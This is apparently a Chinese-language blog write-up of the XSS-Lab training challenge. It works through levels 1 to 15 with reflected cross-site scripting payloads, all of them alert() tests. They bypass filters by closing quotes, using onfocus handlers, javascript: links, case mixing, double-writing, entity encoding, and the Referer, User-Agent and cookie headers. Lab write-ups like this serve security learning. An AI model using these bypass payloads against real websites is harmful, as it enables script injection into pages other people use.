XSS-Lab

这一道题都有20关我真服了

level 1

查看源码

不难发现test会在页面里回显出来 所以我们直接再url里修改name的值

<script>alert(1)</script>

level 2

这里我们继续查看源码

我们继续使用 <script>alert()</script>

这里发现特殊的符号被转义了

我们重新构造payload "> <script>alert()</script> <"就通过了

level 3

这里我们发现不只是<>被实体化了 ' 也被实体化了

所以这道题需要运用到onfocus

我们构造payload ' onfocus=javascript:alert() '

然后再点击输入框获取焦点就通过了

onfocus

onfocus 是一个事件处理器属性,当 HTML 页面中的某个元素获得焦点时,会触发与之关联的事件处理函数。这个事件主要用于表单元素(如 <input><textarea><select>)和可聚焦的元素(如 <a> 链接、按钮等)

level4

这道题是双引号闭合 我们构造payload " onfocus=javascript:alert() "

level 5

这道题不仅过滤了js标签 还过滤了onfocus 我们采用 a herf 标签法

构造payload

复制代码
"> <a href=javascript:alert()>xxx</a> <"

构造好之后点击xss就好了

herf

href 是 HTML <a> 标签的属性,用于指定超链接的目标位置。它告诉浏览器当用户点击该链接时,应该跳转到哪里 href 可以指向网页、文件、电子邮件地址、电话号码,甚至是页面内的某个部分

level 6

这道题过滤了很多东西 但好像没过滤大小写 我们采用大小写绕过

构造payload "> <Script>alert()</Script><"

level 7

这里也是过滤了很多东西 我们采用双写绕过

构造payload

复制代码
"> <a hrehreff=javasscriptcript:alert()>x</a> <"

level 8

这里需要知道herf可以自动unicode解码

制造payload javascript:alert()

编码过后

复制代码
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

level 9

这道题过滤了 http://

制造payload javascript>alert()

这里我们需要经过html编码

复制代码
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;/* http:// */

level 10

没有输入的地方 我们查看源码

关键字

复制代码
" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;

几乎都被实体化了 要使用get传参 这里还是要使用onfocus事件 因为没有输入框所以要加入type="text"

制造payload ?t_sort=" onfocus=javascript:alert() type="text

level 11

这里和上一道题差不多 就是需要用到refere头 传参

构造payload Referer: " onfocus=javascript:alert() type="text

Referer头的定义

Referer头是HTTP请求中的一个标头字段,用于指示当前请求的来源页面。通常由HTTP客户端(如浏览器)发送给服务器,帮助服务器了解用户是从哪个页面跳转而来的

level 12

这里是修改ua的参数完成注入 " onfocus=javascript:alert() type="text

level 13

名字为cook 考虑cookie 制造payload " onfocus=alert() type="text

level 14

这道题网站啥也没有 看下源码吧

level 15

我的出了点问题 第十五关 没跳转成功 下次再做吧

相关推荐
李鸿耀25 分钟前
主题换肤指南:设计到开发的完整实践
前端
带娃的IT创业者5 小时前
TypeScript + React + Ant Design 前端架构入门:搭建一个 Flask 个人博客前端
前端·react.js·typescript
小苑同学6 小时前
安全对齐到底是什么
人工智能·安全
CC-NX6 小时前
移动终端安全:实验2-创建自签名证书对APP签名
安全·安卓逆向·签名校验
非凡ghost6 小时前
MPC-BE视频播放器(强大视频播放器) 中文绿色版
前端·windows·音视频·软件需求
Stanford_11066 小时前
React前端框架有哪些?
前端·微信小程序·前端框架·微信公众平台·twitter·微信开放平台
洛可可白7 小时前
把 Vue2 项目“黑盒”嵌进 Vue3:qiankun 微前端实战笔记
前端·vue.js·笔记
学习同学7 小时前
从0到1制作一个go语言游戏服务器(二)web服务搭建
服务器·前端·golang
-D调定义之崽崽8 小时前
【初学】调试 MCP Server
前端·mcp
四月_h8 小时前
vue2动态实现多Y轴echarts图表,及节点点击事件
前端·javascript·vue.js·echarts